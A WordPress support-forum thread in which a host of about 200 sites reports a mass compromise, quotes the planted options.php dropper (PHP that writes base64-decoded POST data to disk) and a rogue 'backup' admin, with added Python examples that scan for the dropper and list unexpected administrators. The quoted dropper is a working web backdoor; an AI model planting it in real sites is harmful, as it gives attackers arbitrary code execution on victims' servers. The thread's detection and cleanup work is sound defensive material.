• I host around 200 WordPress sites for myself and a handful of clients. Today I noticed that a file named options.php had been uploaded to many of them, appearing in several places throughout each site’s directory structure.

    I have not found evidence of any other files being added yet, and I have not found a common link between the affected sites in terms of WP versions or plugins in use. A few of these sites were in beta with fresh installs of WP and few or no plugins!

    I’m wondering if the attacker may be using a new, unknown exploit. This is the content in each uploaded file:

    <?php
    // Dropper: overwrites itself with whatever the 'da' POST parameter
    // base64-decodes to, so a follow-up request can turn it into any PHP file.
    if (isset($_POST['da'])) {
        file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);
    }
    ?>

    I’m going to do some more digging this morning and start cleaning things up. I’ve never encountered a crack like this, where several sites were affected. Don’t bother posting links to the WP hacking FAQ; I can fix this.

    I’m more interested in discovering the source of the exploit and whether or not it’s something new. If anyone has any input or has seen similar behavior this past week, please post.
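Added example (not code from the original post or from WordPress): a scanner that walks one or more document roots and reports PHP files that either match the quoted dropper's pattern (request data base64-decoded and written to disk) or are an `options.php` anywhere other than `wp-admin/`, the only place core ships one. It hashes each hit so identical copies across sites stand out. The directory layout, file contents and the regular expression are constructed here for illustration.

```python
"""Scan WordPress document roots for dropper files like the one quoted above.

Added example for this thread; it is not code from the original post or from
WordPress.  Directory layout, file contents and the signature below are
constructed here for illustration."""
import hashlib
import os
import re
import tempfile

# Signature of the quoted dropper: request data is base64-decoded and written
# straight to disk.  Whitespace-tolerant and case-insensitive so trivial
# reformatting of the same snippet still matches.
DROPPER_RE = re.compile(
    rb"file_put_contents\s*\([^;]*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)

# WordPress core ships exactly one options.php, under wp-admin/.  The thread
# reports copies "in several places", so any other location is worth a look.
LEGIT_OPTIONS_PHP = ("wp-admin", "options.php")


def scan_for_droppers(root):
    """Return sorted (relative_path, sha256, reasons) tuples for suspicious PHP files.

    Two independent checks feed `reasons`: a misplaced options.php (by name and
    location) and the dropper signature (by content).  Identical hashes across
    sites show the same file was planted everywhere, which is what the thread
    describes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                data = fh.read()
            reasons = []
            if name == "options.php" and tuple(rel.split("/")[-2:]) != LEGIT_OPTIONS_PHP:
                reasons.append("options.php outside wp-admin/")
            if DROPPER_RE.search(data):
                reasons.append("base64 dropper signature")
            if reasons:
                findings.append((rel, hashlib.sha256(data).hexdigest(), reasons))
    return sorted(findings)


# Constructed sample: two small "sites" under one temporary directory.
DROPPER = (b"<?php\nif (isset($_POST['da'])) {\n"
           b"file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);\n"
           b"}\n?>")
SAMPLE_FILES = {
    "site1/wp-admin/options.php": b"<?php // stand-in for the core settings page ?>",
    "site1/wp-includes/functions.php": b"<?php function wp_example() {} ?>",
    "site1/wp-content/uploads/options.php": DROPPER,
    # Same dropper with different spacing and case, to show the regex tolerates it.
    "site1/options.php": DROPPER.replace(b"base64_decode(", b"BASE64_DECODE (  "),
    "site2/options.php": DROPPER,
    # A theme's own settings file: flagged by name only, so it can be triaged quickly.
    "site2/wp-content/themes/demo/options.php": b"<?php // theme settings file, benign ?>",
}


def build_sample_tree():
    """Write SAMPLE_FILES under a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, digest, reasons in scan_for_droppers(build_sample_tree()):
        print(f"{digest[:12]}  {rel}  ({'; '.join(reasons)})")
```

Run it against the real roots with `scan_for_droppers("/var/www")` (path is an example). A hit carrying both reasons is the planted file; a name-only hit such as a theme's `options.php` still deserves a look, since the dropper overwrites itself with whatever is sent next and the content check alone will miss it once that has happened.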

Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator t-p

    (@t-p)

    carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    David_G

    (@questas_admin)

    Hopefully when you figure it out, you’ll post it here.

    Thread Starter C4talyst

    (@c4talyst)

    Tara, I mentioned that guide in my post. I posted here mainly due to concerns that this may be a new exploit within a plugin or the WP core.

    I’m more interested in discovering the source of the exploit and whether or not it’s something new

    You need to parse your server logs for hints at what happened. Is this your own server? A managed server with a webhost?

    Thread Starter C4talyst

    (@c4talyst)

    My server. I’ve been through the logs but I’m not running mod_security so the information is limited. I’m just now starting to go through all the sites. Several were running older WP versions and had some outdated plugins; however, a few were running WP 4.3.1 with only a handful of up-to-date plugins in place. It looks like in each case, an admin user named ‘backup’ was also added.

    Several were running older WP versions and have some outdated plugins….

    Once they were in, they could traverse the database and add users to any site.

    Sounds like you need to learn server security; try https://serverfault.com

    Thread Starter C4talyst

    (@c4talyst)

    I don’t think the server was rooted through any of these attacks. Are you saying there are past WP or plugin exploits that allowed database users to be added to other sites?

    It’s generally pretty obvious to tell when a server has been rooted, especially if the attackers are using it for anything (usually spam).

    In the case of this attack, these sites all received the uploaded file I mentioned, and the added user (and nothing else) on the morning of October 10. I think these sites were all hit individually using an automated tool.

    “Traversing” the database makes no sense…the attackers would be limited to using the one account they had access to, if they could read wp-config.php.
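Added example (not code from the original post or from WordPress): enumerating the administrator accounts of a site and flagging any that are not on the operator's known-good list, which is how a planted user like the ‘backup’ account above turns up across many sites without opening each dashboard. WordPress keeps roles as a PHP-serialized array in `wp_usermeta`; the code parses that so a role set to `false` is not counted. It runs here against an in-memory SQLite stand-in for the two core tables; the SQL is plain enough to run unchanged on the real MySQL database, with the `wp_` table prefix being an assumption.

```python
"""List administrator accounts in a WordPress database and flag ones that are
not expected, such as the 'backup' user mentioned above.

Added example for this thread, not code from the original post or from
WordPress.  It runs against an in-memory SQLite copy of the two relevant core
tables so it works offline; the same SQL runs unchanged on the real MySQL
database (the 'wp_' prefix is the default and is an assumption here)."""
import re
import sqlite3

# WordPress stores roles as a PHP-serialized array in wp_usermeta, e.g.
#   a:1:{s:13:"administrator";b:1;}
# Matching on the string alone also matches a role set to false (b:0), so the
# roles are parsed and only those set to true count.
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:([01]);')

ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
ORDER BY u.user_registered
"""


def active_roles(serialized):
    """Return the set of role names whose flag is true in a serialized roles array."""
    return {role for role, flag in ROLE_RE.findall(serialized) if flag == "1"}


def list_admins(conn):
    """Return (login, email, registered) for every user whose administrator role is true."""
    admins = []
    for _id, login, email, registered, caps in conn.execute(ADMIN_QUERY):
        if "administrator" in active_roles(caps):
            admins.append((login, email, registered))
    return admins


def find_rogue_admins(conn, expected_logins):
    """Administrators not in the operator's known-good list, oldest first."""
    return [a for a in list_admins(conn) if a[0] not in expected_logins]


def build_sample_db():
    """Constructed stand-in for the two core tables, with one planted account."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_email TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    users = [
        (1, "admin", "owner@example.com", "2015-01-05 10:00:00", 'a:1:{s:13:"administrator";b:1;}'),
        (2, "jane", "jane@example.com", "2015-03-12 09:15:00", 'a:1:{s:6:"editor";b:1;}'),
        # Matches the LIKE clause but the role is false: must not be reported.
        (3, "olduser", "old@example.com", "2015-04-01 12:00:00", 'a:1:{s:13:"administrator";b:0;}'),
        # The planted account; the registration time is constructed.
        (4, "backup", "backup@example.net", "2015-10-10 06:41:13", 'a:1:{s:13:"administrator";b:1;}'),
    ]
    for uid, login, email, registered, caps in users:
        conn.execute("INSERT INTO wp_users VALUES (?, ?, ?, ?)", (uid, login, email, registered))
        conn.execute("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) "
                     "VALUES (?, 'wp_capabilities', ?)", (uid, caps))
    return conn


if __name__ == "__main__":
    for login, email, registered in find_rogue_admins(build_sample_db(), {"admin"}):
        print(f"unexpected administrator: {login} <{email}> registered {registered}")
```

Against real sites, point it at each database with the site's own prefix substituted into the table names and `meta_key`, and keep the expected-login set per client. The `user_registered` value of anything flagged is the timestamp to carry back into the access logs.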

    Thread Starter C4talyst

    (@c4talyst)

    Also, how would a few outdated cores and plugins on other sites explain the files showing up on brand-new 4.3.1 sites running no plugins?

    David_G

    (@questas_admin)

    I use BulletProof Security Pro on all my sites. Since installing it no one has managed to hack them, add users or files, or access the DB. It’s a very good plugin with excellent support. There is a free version also. Any time a file that isn’t already on the site is added, it gets quarantined immediately, then I have the option to keep it or delete it. You can whitelist certain folders like the child theme so it isn’t affected. But this plugin is the best in my book.

  • The topic ‘Dozens of WP Sites Hacked’ is closed to new replies.